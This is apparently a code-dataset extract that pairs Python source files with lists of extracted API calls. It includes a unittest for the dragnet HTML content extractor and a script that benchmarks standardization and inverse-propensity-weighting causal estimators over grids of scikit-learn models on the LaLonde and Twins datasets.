(['(30)', '(30)', '(30)'], {}), '(30, 30, 30)\n', (25480, 25492), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((26685, 26700), 'PyQt5.QtGui.QPixmap', 'QtGui.QPixmap', ([], {}), '()\n', (26698, 26700), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((31910, 31947), 'PyQt5.QtGui.QPixmap.fromImage', 'QPixmap.fromImage', (['self.viewer.qImage'], {}), '(self.viewer.qImage)\n', (31927, 31947), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((41061, 41093), 'numpy.abs', 'np.abs', (['((wl - 510) / (510 - 490))'], {}), '((wl - 510) / (510 - 490))\n', (41067, 41093), True, 'import numpy as np\n'), ((5084, 5103), 'numpy.diff', 'np.diff', (['xLim[n, :]'], {}), '(xLim[n, :])\n', (5091, 5103), True, 'import numpy as np\n'), ((8300, 8323), 'numpy.max', 'np.max', (['virts[n, 2:-10]'], {}), '(virts[n, 2:-10])\n', (8306, 8323), True, 'import numpy as np\n'), ((25860, 25885), 'PyQt5.QtCore.QRectF', 'QtCore.QRectF', (['(0)', '(0)', '(1)', '(1)'], {}), '(0, 0, 1, 1)\n', (25873, 25885), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((32350, 32387), 'PyQt5.QtGui.QPixmap.fromImage', 'QPixmap.fromImage', (['self.viewer.qImage'], {}), '(self.viewer.qImage)\n', (32367, 32387), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((32708, 32745), 'PyQt5.QtGui.QPixmap.fromImage', 'QPixmap.fromImage', (['self.viewer.qImage'], {}), '(self.viewer.qImage)\n', (32725, 32745), False, 'from PyQt5.QtGui import QImage, QPixmap, QIcon\n'), ((39113, 
39141), 'PyQt5.QtCore.QUrl.fromLocalFile', 'QUrl.fromLocalFile', (['fileName'], {}), '(fileName)\n', (39131, 39141), False, 'from PyQt5.QtCore import QDir, Qt, QUrl\n'), ((41133, 41165), 'numpy.abs', 'np.abs', (['((wl - 510) / (580 - 510))'], {}), '((wl - 510) / (580 - 510))\n', (41139, 41165), True, 'import numpy as np\n'), ((41252, 41284), 'numpy.abs', 'np.abs', (['((wl - 645) / (645 - 580))'], {}), '((wl - 645) / (645 - 580))\n', (41258, 41284), True, 'import numpy as np\n')]
|
import io
import os
import unittest
import numpy as np
from sklearn.linear_model import LogisticRegression
from dragnet import Extractor
from dragnet.blocks import TagCountNoCSSReadabilityBlockifier
from dragnet.util import get_and_union_features
from dragnet.compat import str_cast
with io.open(os.path.join('test', 'datafiles', 'models_testing.html'), 'r') as f:
big_html_doc = f.read()
class TestExtractor(unittest.TestCase):
def test_extractor(self):
prob_threshold = 0.5
blockifier = TagCountNoCSSReadabilityBlockifier()
features = get_and_union_features(['weninger', 'kohlschuetter', 'readability'])
# initialize model from pre-fit attributes
model_attrs = {
'C': 1.0,
'class_weight': None,
'classes_': [0, 1],
'coef_': [[0.00501458328421719, -0.0006331822163374379, -0.6699789320373452, 0.026069227973339763, -1.5552477377277252, 0.02980432745983307, -0.965575689884716, 0.019509367890934326, -0.35692924115362307]],
'dual': False,
'fit_intercept': True,
'intercept_': [-1.2071425754440765],
'intercept_scaling': 1,
'max_iter': 100,
'multi_class': 'ovr',
'n_iter_': [12],
'n_jobs': 1,
'penalty': 'l2',
'solver': 'liblinear',
'tol': 0.0001,
'warm_start': False}
model = LogisticRegression()
for k, v in model_attrs.items():
if isinstance(v, list):
setattr(model, k, np.array(v))
else:
setattr(model, k, v)
# extract content via the extractor class
extractor = Extractor(blockifier, features=features, model=model,
to_extract='content', prob_threshold=prob_threshold)
extractor_content = extractor.extract(big_html_doc)
# extract content via individual components
blocks = blockifier.blockify(big_html_doc)
features_mat = features.transform(blocks)
positive_idx = list(model.classes_).index(1)
preds = (model.predict_proba(features_mat) > prob_threshold)[:, positive_idx].astype(int)
components_content = '\n'.join(str_cast(blocks[ind].text) for ind in np.flatnonzero(preds))
self.assertIsNotNone(extractor_content)
self.assertEqual(extractor_content, components_content)
if __name__ == "__main__":
unittest.main()
|
[
"unittest.main",
"dragnet.Extractor",
"numpy.flatnonzero",
"dragnet.util.get_and_union_features",
"sklearn.linear_model.LogisticRegression",
"dragnet.compat.str_cast",
"numpy.array",
"dragnet.blocks.TagCountNoCSSReadabilityBlockifier",
"os.path.join"
] |
[((2451, 2466), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2464, 2466), False, 'import unittest\n'), ((300, 356), 'os.path.join', 'os.path.join', (['"""test"""', '"""datafiles"""', '"""models_testing.html"""'], {}), "('test', 'datafiles', 'models_testing.html')\n", (312, 356), False, 'import os\n'), ((521, 557), 'dragnet.blocks.TagCountNoCSSReadabilityBlockifier', 'TagCountNoCSSReadabilityBlockifier', ([], {}), '()\n', (555, 557), False, 'from dragnet.blocks import TagCountNoCSSReadabilityBlockifier\n'), ((577, 645), 'dragnet.util.get_and_union_features', 'get_and_union_features', (["['weninger', 'kohlschuetter', 'readability']"], {}), "(['weninger', 'kohlschuetter', 'readability'])\n", (599, 645), False, 'from dragnet.util import get_and_union_features\n'), ((1432, 1452), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {}), '()\n', (1450, 1452), False, 'from sklearn.linear_model import LogisticRegression\n'), ((1703, 1813), 'dragnet.Extractor', 'Extractor', (['blockifier'], {'features': 'features', 'model': 'model', 'to_extract': '"""content"""', 'prob_threshold': 'prob_threshold'}), "(blockifier, features=features, model=model, to_extract='content',\n prob_threshold=prob_threshold)\n", (1712, 1813), False, 'from dragnet import Extractor\n'), ((2244, 2270), 'dragnet.compat.str_cast', 'str_cast', (['blocks[ind].text'], {}), '(blocks[ind].text)\n', (2252, 2270), False, 'from dragnet.compat import str_cast\n'), ((1564, 1575), 'numpy.array', 'np.array', (['v'], {}), '(v)\n', (1572, 1575), True, 'import numpy as np\n'), ((2282, 2303), 'numpy.flatnonzero', 'np.flatnonzero', (['preds'], {}), '(preds)\n', (2296, 2303), True, 'import numpy as np\n')]
|
"""Copyright © 2020-present, Swisscom (Schweiz) AG.
All rights reserved."""
from .feature import Feature
from scipy.stats import entropy
import numpy as np
class KLDivergence(Feature):
r"""
A feature that computes the KL divergence between the
logits of each data points given by a classifier mean logits
for each label and the mean of these logits for each label
----------
mean_logits : array-like of shape (n_classes, n_classes) is the mean of the logits of datapoints
having the same label. First dimension should be labels, second should be the mean logit for
this label
Attributes
----------
mean_logits: ' '
"""
def __init__(self, mean_logits):
self.mean_logits = mean_logits
def augment(self, logits):
"""
Performs the data augmentation.
Computes the KL divergence between the parameter logits and
the attribute mean_logits
:param
logits: array-like of shape (n_classes, n_samples)
:return:
C : array-like of shape (n_classes, n_samples)
"""
return np.array([entropy(logits,
np.repeat(mean_logit[..., np.newaxis], logits.shape[1], axis=1), base=2)
for mean_logit in self.mean_logits])
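# Illustrative usage sketch (added for documentation; not part of the original
# class). Shapes are arbitrary: 3 labels and 4 samples. scipy's entropy()
# normalises its inputs, so any positive values work as stand-in logits here.
def _example_kl_feature():
    mean_logits = np.full((3, 3), 1.0 / 3.0)   # (n_classes, n_classes)
    logits = np.random.rand(3, 4)             # (n_classes, n_samples)
    return KLDivergence(mean_logits).augment(logits)   # shape (3, 4)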
|
[
"numpy.repeat"
] |
[((1168, 1231), 'numpy.repeat', 'np.repeat', (['mean_logit[..., np.newaxis]', 'logits.shape[1]'], {'axis': '(1)'}), '(mean_logit[..., np.newaxis], logits.shape[1], axis=1)\n', (1177, 1231), True, 'import numpy as np\n')]
|
import numpy as np
import pandas as pd
import time
from pathlib import Path
from experiments.evaluation import calculate_metrics
from causal_estimators.ipw_estimator import IPWEstimator
from causal_estimators.standardization_estimator import \
StandardizationEstimator, StratifiedStandardizationEstimator
from experiments.evaluation import run_model_cv
from loading import load_from_folder
from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier
from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC
from sklearn.kernel_ridge import KernelRidge
from sklearn.neural_network import MLPClassifier, MLPRegressor
from sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor
from sklearn.gaussian_process import GaussianProcessClassifier, GaussianProcessRegressor
from sklearn.gaussian_process.kernels import RBF
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.ensemble import RandomForestRegressor, AdaBoostRegressor, GradientBoostingRegressor,\
RandomForestClassifier, AdaBoostClassifier, GradientBoostingClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis, QuadraticDiscriminantAnalysis
from sklearn.pipeline import Pipeline, make_pipeline
from sklearn.preprocessing import StandardScaler, PolynomialFeatures
from sklearn.exceptions import UndefinedMetricWarning
import warnings
warnings.simplefilter(action='ignore', category=UndefinedMetricWarning)
# warnings.filterwarnings("ignore", message="UndefinedMetricWarning: Precision is ill-defined and being set to 0.0 due to no predicted samples. Use `zero_division` parameter to control this behavior.")
RESULTS_DIR = Path('results')
alphas = {'alpha': np.logspace(-4, 5, 10)}
# gammas = [] + ['scale']
Cs = np.logspace(-4, 5, 10)
d_Cs = {'C': Cs}
SVM = 'svm'
d_Cs_pipeline = {SVM + '__C': Cs}
max_depths = list(range(2, 10 + 1)) + [None]
d_max_depths = {'max_depth': max_depths}
d_max_depths_base = {'base_estimator__max_depth': max_depths}
Ks = {'n_neighbors': [1, 2, 3, 5, 10, 15, 25, 50, 100, 200]}
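# Each grid entry below is (display name, sklearn estimator, hyperparameter grid handed to CV).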
OUTCOME_MODEL_GRID = [
('LinearRegression', LinearRegression(), {}),
('LinearRegression_interact',
make_pipeline(PolynomialFeatures(degree=2, interaction_only=True),
LinearRegression()),
{}),
('LinearRegression_degree2',
make_pipeline(PolynomialFeatures(degree=2), LinearRegression()), {}),
# ('LinearRegression_degree3',
# make_pipeline(PolynomialFeatures(degree=3), LinearRegression()), {}),
('Ridge', Ridge(), alphas),
('Lasso', Lasso(), alphas),
('ElasticNet', ElasticNet(), alphas),
('KernelRidge', KernelRidge(), alphas),
('SVM_rbf', SVR(kernel='rbf'), d_Cs),
('SVM_sigmoid', SVR(kernel='sigmoid'), d_Cs),
('LinearSVM', LinearSVR(), d_Cs),
# (SVR(kernel='linear'), d_Cs), # doesn't seem to work (runs forever)
# TODO: add tuning of SVM gamma, rather than using the default "scale" setting
# SVMs are sensitive to input scale
('Standardized_SVM_rbf', Pipeline([('standard', StandardScaler()), (SVM, SVR(kernel='rbf'))]),
d_Cs_pipeline),
('Standardized_SVM_sigmoid', Pipeline([('standard', StandardScaler()), (SVM, SVR(kernel='sigmoid'))]),
d_Cs_pipeline),
('Standardized_LinearSVM', Pipeline([('standard', StandardScaler()), (SVM, LinearSVR())]),
d_Cs_pipeline),
('kNN', KNeighborsRegressor(), Ks),
# GaussianProcessRegressor(),
# TODO: also cross-validate over min_samples_split and min_samples_leaf
('DecisionTree', DecisionTreeRegressor(), d_max_depths),
# ('RandomForest', RandomForestRegressor(), d_max_depths),
# TODO: also cross-validate over learning_rate
# ('AdaBoost', AdaBoostRegressor(base_estimator=DecisionTreeRegressor(max_depth=None)), d_max_depths_base),
# ('GradientBoosting', GradientBoostingRegressor(), d_max_depths),
# MLPRegressor(max_iter=1000),
# MLPRegressor(alpha=1, max_iter=1000),
]
PROP_SCORE_MODEL_GRID = [
('LogisticRegression_l2', LogisticRegression(penalty='l2'), d_Cs),
('LogisticRegression', LogisticRegression(penalty='none'), {}),
('LogisticRegression_l2_liblinear', LogisticRegression(penalty='l2', solver='liblinear'), d_Cs),
('LogisticRegression_l1_liblinear', LogisticRegression(penalty='l1', solver='liblinear'), d_Cs),
('LogisticRegression_l1_saga', LogisticRegression(penalty='l1', solver='saga'), d_Cs),
('LDA', LinearDiscriminantAnalysis(), {}),
('LDA_shrinkage', LinearDiscriminantAnalysis(solver='lsqr', shrinkage='auto'), {}),
('QDA', QuadraticDiscriminantAnalysis(), {}),
# TODO: add tuning of SVM gamma, rather than using the default "scale" setting
('SVM_rbf', SVC(kernel='rbf', probability=True), d_Cs),
('SVM_sigmoid', SVC(kernel='sigmoid', probability=True), d_Cs),
# ('SVM_linear', SVC(kernel='linear', probability=True), d_Cs), # doesn't seem to work (runs forever)
# SVMs are sensitive to input scale
('Standardized_SVM_rbf', Pipeline([('standard', StandardScaler()), (SVM, SVC(kernel='rbf', probability=True))]),
d_Cs_pipeline),
('Standardized_SVM_sigmoid', Pipeline([('standard', StandardScaler()),
(SVM, SVC(kernel='sigmoid', probability=True))]),
d_Cs_pipeline),
# ('Standardized_SVM_linear', Pipeline([('standard', StandardScaler()),
# (SVM, SVC(kernel='linear', probability=True))]),
# d_Cs_pipeline), # doesn't seem to work (runs forever)
('kNN', KNeighborsClassifier(), Ks),
# GaussianProcessClassifier(),
('GaussianNB', GaussianNB(), {}),
# TODO: also cross-validate over min_samples_split and min_samples_leaf
('DecisionTree', DecisionTreeClassifier(), d_max_depths),
# ('RandomForest', RandomForestClassifier(), max_depths),
# TODO: also cross-validate over learning_rate
# ('AdaBoost', AdaBoostClassifier(base_estimator=DecisionTreeClassifier(max_depth=None)), d_max_depths_base),
# ('GradientBoosting', GradientBoostingClassifier(), d_max_depths),
# MLPClassifier(max_iter=1000),
# MLPClassifier(alpha=1, max_iter=1000),
]
psid_gen_model, args = load_from_folder(dataset='lalonde_psid1')
cps_gen_model, args = load_from_folder(dataset='lalonde_cps1')
twins_gen_model, args = load_from_folder(dataset='twins')
psid_ate = psid_gen_model.ate(noisy=True)
psid_ite = psid_gen_model.ite(noisy=True).squeeze()
cps_ate = cps_gen_model.ate(noisy=True)
cps_ite = cps_gen_model.ite(noisy=True).squeeze()
twins_ate = twins_gen_model.ate(noisy=False)
twins_ite = twins_gen_model.ite(noisy=False).squeeze()
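# Each entry: (dataset name, generative model, ground-truth ATE, ground-truth ITE).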
GEN_MODELS = [
('lalonde_psid', psid_gen_model, psid_ate, psid_ite),
('lalonde_cps', cps_gen_model, cps_ate, cps_ite),
('twins', twins_gen_model, twins_ate, twins_ite)
]
t_start = time.time()
N_SEEDS_CV = 5
N_SEEDS_METRICS = 5
def run_experiments_for_estimator(get_estimator_func, model_grid, save_location,
meta_est_name, model_type, exclude=[],
gen_models=GEN_MODELS, n_seeds_cv=N_SEEDS_CV,
n_seeds_metrics=N_SEEDS_METRICS):
# if outcome_model_grid is None and prop_score_model_grid is None:
# raise ValueError('Either outcome_model_grid or prop_score_model_grid must be not None.')
# if outcome_model_grid is not None and prop_score_model_grid is not None:
# raise ValueError('Currently only supporting one non-None model grid.')
# outcome_modeling = outcome_model_grid is not None
# model_grid = outcome_model_grid if outcome_modeling else prop_score_model_grid
# model_type = 'outcome' if outcome_modeling else 'prop_score'
valid_model_types = ['outcome', 'prop_score']
if model_type not in valid_model_types:
raise ValueError('Invalid model_type... Valid model_types: {}'.format(valid_model_types))
param_str = 'params_' + model_type + '_model'
dataset_dfs = []
for gen_name, gen_model, ate, ite in gen_models:
print('DATASET:', gen_name)
dataset_start = time.time()
model_dfs = []
for model_name, model, param_grid in model_grid:
print('MODEL:', model_name)
if (gen_name, model_name) in exclude or model_name in exclude:
print('SKIPPING')
continue
model_start = time.time()
results = run_model_cv(gen_model, model, model_name=model_name, param_grid=param_grid,
n_seeds=n_seeds_cv, model_type=model_type, best_model=False, ret_time=False)
metrics_list = []
for params in results[param_str]:
try:
est_start = time.time()
estimator = get_estimator_func(model.set_params(**params))
metrics = calculate_metrics(gen_model, estimator, n_seeds=n_seeds_metrics,
conf_ints=False, ate=ate, ite=ite)
est_end = time.time()
# Add estimator fitting time in minutes
metrics['time'] = (est_end - est_start) / 60
metrics_list.append(metrics)
except ValueError:
print('Skipping {} params: {}'.format(model_name, params))
causal_metrics = pd.DataFrame(metrics_list)
model_df = pd.concat([results, causal_metrics], axis=1)
model_df.insert(0, 'dataset', gen_name)
model_df.insert(1, 'meta-estimator', meta_est_name)
model_dfs.append(model_df)
model_end = time.time()
print(model_name, 'time:', (model_end - model_start) / 60, 'minutes')
dataset_df = pd.concat(model_dfs, axis=0)
dataset_end = time.time()
print(gen_name, 'time:', (dataset_end - dataset_start) / 60 / 60, 'hours')
dataset_dfs.append(dataset_df)
full_df = pd.concat(dataset_dfs, axis=0)
t_end = time.time()
print('Total time elapsed:', (t_end - t_start) / 60 / 60, 'hours')
full_df.to_csv(save_location, float_format='%.2f', index=False)
return full_df
print('STANDARDIZATION')
stand_df = run_experiments_for_estimator(
lambda model: StandardizationEstimator(outcome_model=model),
model_grid=OUTCOME_MODEL_GRID,
save_location=RESULTS_DIR / 'psid_cps_twins_standard.csv',
meta_est_name='standardization',
model_type='outcome',
gen_models=GEN_MODELS)
print('STRATIFIED STANDARDIZATION')
strat_df = run_experiments_for_estimator(
lambda model: StratifiedStandardizationEstimator(outcome_models=model),
model_grid=OUTCOME_MODEL_GRID,
exclude=[('lalonde_cps', 'KernelRidge')],
save_location=RESULTS_DIR / 'psid_cps_twins_strat_standard.csv',
meta_est_name='stratified_standardization',
model_type='outcome',
gen_models=GEN_MODELS)
print('IPW')
ps_df = run_experiments_for_estimator(
lambda model: IPWEstimator(prop_score_model=model),
model_grid=PROP_SCORE_MODEL_GRID,
# exclude=[('lalonde_psid', 'SVM_rbf')],
exclude=['SVM_rbf'],
save_location=RESULTS_DIR / 'psid_cps_twins_ipw.csv',
meta_est_name='ipw',
model_type='prop_score',
gen_models=GEN_MODELS)
print('IPW TRIM EPS 0.01')
ps_trim_df = run_experiments_for_estimator(
lambda model: IPWEstimator(prop_score_model=model, trim_eps=0.01),
model_grid=PROP_SCORE_MODEL_GRID,
# exclude=[('lalonde_psid', 'SVM_rbf')],
exclude=['SVM_rbf'],
save_location=RESULTS_DIR / 'psid_cps_twins_ipw_trim_01.csv',
meta_est_name='ipw_trimeps.01',
model_type='prop_score',
gen_models=GEN_MODELS)
print('IPW Stabilized weights')
ps_stab_df = run_experiments_for_estimator(
lambda model: IPWEstimator(prop_score_model=model, stabilized=True),
model_grid=PROP_SCORE_MODEL_GRID,
# exclude=[('lalonde_psid', 'SVM_rbf')],
exclude=['SVM_rbf'],
save_location=RESULTS_DIR / 'psid_cps_twins_ipw_stabilized.csv',
meta_est_name='ipw_stabilized',
model_type='prop_score',
gen_models=GEN_MODELS)
|
[
"sklearn.preprocessing.StandardScaler",
"numpy.logspace",
"experiments.evaluation.calculate_metrics",
"sklearn.tree.DecisionTreeClassifier",
"loading.load_from_folder",
"pathlib.Path",
"sklearn.svm.SVC",
"sklearn.discriminant_analysis.QuadraticDiscriminantAnalysis",
"causal_estimators.standardization_estimator.StandardizationEstimator",
"pandas.DataFrame",
"warnings.simplefilter",
"sklearn.tree.DecisionTreeRegressor",
"sklearn.linear_model.ElasticNet",
"pandas.concat",
"sklearn.svm.LinearSVR",
"sklearn.linear_model.Lasso",
"sklearn.linear_model.Ridge",
"experiments.evaluation.run_model_cv",
"sklearn.linear_model.LinearRegression",
"sklearn.linear_model.LogisticRegression",
"sklearn.discriminant_analysis.LinearDiscriminantAnalysis",
"causal_estimators.ipw_estimator.IPWEstimator",
"sklearn.svm.SVR",
"sklearn.neighbors.KNeighborsRegressor",
"sklearn.naive_bayes.GaussianNB",
"sklearn.kernel_ridge.KernelRidge",
"time.time",
"causal_estimators.standardization_estimator.StratifiedStandardizationEstimator",
"sklearn.preprocessing.PolynomialFeatures",
"sklearn.neighbors.KNeighborsClassifier"
] |
[((1465, 1536), 'warnings.simplefilter', 'warnings.simplefilter', ([], {'action': '"""ignore"""', 'category': 'UndefinedMetricWarning'}), "(action='ignore', category=UndefinedMetricWarning)\n", (1486, 1536), False, 'import warnings\n'), ((1754, 1769), 'pathlib.Path', 'Path', (['"""results"""'], {}), "('results')\n", (1758, 1769), False, 'from pathlib import Path\n'), ((1845, 1867), 'numpy.logspace', 'np.logspace', (['(-4)', '(5)', '(10)'], {}), '(-4, 5, 10)\n', (1856, 1867), True, 'import numpy as np\n'), ((6260, 6301), 'loading.load_from_folder', 'load_from_folder', ([], {'dataset': '"""lalonde_psid1"""'}), "(dataset='lalonde_psid1')\n", (6276, 6301), False, 'from loading import load_from_folder\n'), ((6324, 6364), 'loading.load_from_folder', 'load_from_folder', ([], {'dataset': '"""lalonde_cps1"""'}), "(dataset='lalonde_cps1')\n", (6340, 6364), False, 'from loading import load_from_folder\n'), ((6389, 6422), 'loading.load_from_folder', 'load_from_folder', ([], {'dataset': '"""twins"""'}), "(dataset='twins')\n", (6405, 6422), False, 'from loading import load_from_folder\n'), ((6902, 6913), 'time.time', 'time.time', ([], {}), '()\n', (6911, 6913), False, 'import time\n'), ((1790, 1812), 'numpy.logspace', 'np.logspace', (['(-4)', '(5)', '(10)'], {}), '(-4, 5, 10)\n', (1801, 1812), True, 'import numpy as np\n'), ((10030, 10060), 'pandas.concat', 'pd.concat', (['dataset_dfs'], {'axis': '(0)'}), '(dataset_dfs, axis=0)\n', (10039, 10060), True, 'import pandas as pd\n'), ((10074, 10085), 'time.time', 'time.time', ([], {}), '()\n', (10083, 10085), False, 'import time\n'), ((2189, 2207), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (2205, 2207), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((2605, 2612), 'sklearn.linear_model.Ridge', 'Ridge', ([], {}), '()\n', (2610, 2612), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((2637, 2644), 'sklearn.linear_model.Lasso', 'Lasso', ([], {}), '()\n', (2642, 2644), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((2674, 2686), 'sklearn.linear_model.ElasticNet', 'ElasticNet', ([], {}), '()\n', (2684, 2686), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((2718, 2731), 'sklearn.kernel_ridge.KernelRidge', 'KernelRidge', ([], {}), '()\n', (2729, 2731), False, 'from sklearn.kernel_ridge import KernelRidge\n'), ((2759, 2776), 'sklearn.svm.SVR', 'SVR', ([], {'kernel': '"""rbf"""'}), "(kernel='rbf')\n", (2762, 2776), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((2805, 2826), 'sklearn.svm.SVR', 'SVR', ([], {'kernel': '"""sigmoid"""'}), "(kernel='sigmoid')\n", (2808, 2826), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((2853, 2864), 'sklearn.svm.LinearSVR', 'LinearSVR', ([], {}), '()\n', (2862, 2864), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((3448, 3469), 'sklearn.neighbors.KNeighborsRegressor', 'KNeighborsRegressor', ([], {}), '()\n', (3467, 3469), False, 'from sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor\n'), ((3609, 3632), 'sklearn.tree.DecisionTreeRegressor', 'DecisionTreeRegressor', ([], {}), '()\n', (3630, 3632), False, 'from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\n'), ((4086, 4118), 
'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""l2"""'}), "(penalty='l2')\n", (4104, 4118), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((4154, 4188), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""none"""'}), "(penalty='none')\n", (4172, 4188), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((4235, 4287), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""l2"""', 'solver': '"""liblinear"""'}), "(penalty='l2', solver='liblinear')\n", (4253, 4287), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((4336, 4388), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""l1"""', 'solver': '"""liblinear"""'}), "(penalty='l1', solver='liblinear')\n", (4354, 4388), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((4432, 4479), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""l1"""', 'solver': '"""saga"""'}), "(penalty='l1', solver='saga')\n", (4450, 4479), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((4501, 4529), 'sklearn.discriminant_analysis.LinearDiscriminantAnalysis', 'LinearDiscriminantAnalysis', ([], {}), '()\n', (4527, 4529), False, 'from sklearn.discriminant_analysis import LinearDiscriminantAnalysis, QuadraticDiscriminantAnalysis\n'), ((4558, 4617), 'sklearn.discriminant_analysis.LinearDiscriminantAnalysis', 'LinearDiscriminantAnalysis', ([], {'solver': '"""lsqr"""', 'shrinkage': '"""auto"""'}), "(solver='lsqr', shrinkage='auto')\n", (4584, 4617), False, 'from sklearn.discriminant_analysis import LinearDiscriminantAnalysis, QuadraticDiscriminantAnalysis\n'), ((4636, 4667), 'sklearn.discriminant_analysis.QuadraticDiscriminantAnalysis', 'QuadraticDiscriminantAnalysis', ([], {}), '()\n', (4665, 4667), False, 'from sklearn.discriminant_analysis import LinearDiscriminantAnalysis, QuadraticDiscriminantAnalysis\n'), ((4774, 4809), 'sklearn.svm.SVC', 'SVC', ([], {'kernel': '"""rbf"""', 'probability': '(True)'}), "(kernel='rbf', probability=True)\n", (4777, 4809), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((4838, 4877), 'sklearn.svm.SVC', 'SVC', ([], {'kernel': '"""sigmoid"""', 'probability': '(True)'}), "(kernel='sigmoid', probability=True)\n", (4841, 4877), False, 'from sklearn.svm import SVR, LinearSVR, SVC, LinearSVC\n'), ((5610, 5632), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ([], {}), '()\n', (5630, 5632), False, 'from sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor\n'), ((5694, 5706), 'sklearn.naive_bayes.GaussianNB', 'GaussianNB', ([], {}), '()\n', (5704, 5706), False, 'from sklearn.naive_bayes import GaussianNB\n'), ((5811, 5835), 'sklearn.tree.DecisionTreeClassifier', 'DecisionTreeClassifier', ([], {}), '()\n', (5833, 5835), False, 'from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\n'), ((8169, 8180), 'time.time', 'time.time', ([], {}), '()\n', (8178, 8180), False, 'import time\n'), ((9831, 9859), 'pandas.concat', 'pd.concat', (['model_dfs'], {'axis': '(0)'}), '(model_dfs, axis=0)\n', (9840, 9859), True, 'import pandas as pd\n'), 
((9882, 9893), 'time.time', 'time.time', ([], {}), '()\n', (9891, 9893), False, 'import time\n'), ((10331, 10376), 'causal_estimators.standardization_estimator.StandardizationEstimator', 'StandardizationEstimator', ([], {'outcome_model': 'model'}), '(outcome_model=model)\n', (10355, 10376), False, 'from causal_estimators.standardization_estimator import StandardizationEstimator, StratifiedStandardizationEstimator\n'), ((10663, 10719), 'causal_estimators.standardization_estimator.StratifiedStandardizationEstimator', 'StratifiedStandardizationEstimator', ([], {'outcome_models': 'model'}), '(outcome_models=model)\n', (10697, 10719), False, 'from causal_estimators.standardization_estimator import StandardizationEstimator, StratifiedStandardizationEstimator\n'), ((11043, 11079), 'causal_estimators.ipw_estimator.IPWEstimator', 'IPWEstimator', ([], {'prop_score_model': 'model'}), '(prop_score_model=model)\n', (11055, 11079), False, 'from causal_estimators.ipw_estimator import IPWEstimator\n'), ((11418, 11469), 'causal_estimators.ipw_estimator.IPWEstimator', 'IPWEstimator', ([], {'prop_score_model': 'model', 'trim_eps': '(0.01)'}), '(prop_score_model=model, trim_eps=0.01)\n', (11430, 11469), False, 'from causal_estimators.ipw_estimator import IPWEstimator\n'), ((11832, 11885), 'causal_estimators.ipw_estimator.IPWEstimator', 'IPWEstimator', ([], {'prop_score_model': 'model', 'stabilized': '(True)'}), '(prop_score_model=model, stabilized=True)\n', (11844, 11885), False, 'from causal_estimators.ipw_estimator import IPWEstimator\n'), ((2267, 2318), 'sklearn.preprocessing.PolynomialFeatures', 'PolynomialFeatures', ([], {'degree': '(2)', 'interaction_only': '(True)'}), '(degree=2, interaction_only=True)\n', (2285, 2318), False, 'from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n'), ((2339, 2357), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (2355, 2357), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((2422, 2450), 'sklearn.preprocessing.PolynomialFeatures', 'PolynomialFeatures', ([], {'degree': '(2)'}), '(degree=2)\n', (2440, 2450), False, 'from sklearn.preprocessing import StandardScaler, PolynomialFeatures\n'), ((2452, 2470), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (2468, 2470), False, 'from sklearn.linear_model import LogisticRegression, LinearRegression, Lasso, Ridge, ElasticNet, RidgeClassifier\n'), ((8461, 8472), 'time.time', 'time.time', ([], {}), '()\n', (8470, 8472), False, 'import time\n'), ((8495, 8657), 'experiments.evaluation.run_model_cv', 'run_model_cv', (['gen_model', 'model'], {'model_name': 'model_name', 'param_grid': 'param_grid', 'n_seeds': 'n_seeds_cv', 'model_type': 'model_type', 'best_model': '(False)', 'ret_time': '(False)'}), '(gen_model, model, model_name=model_name, param_grid=param_grid,\n n_seeds=n_seeds_cv, model_type=model_type, best_model=False, 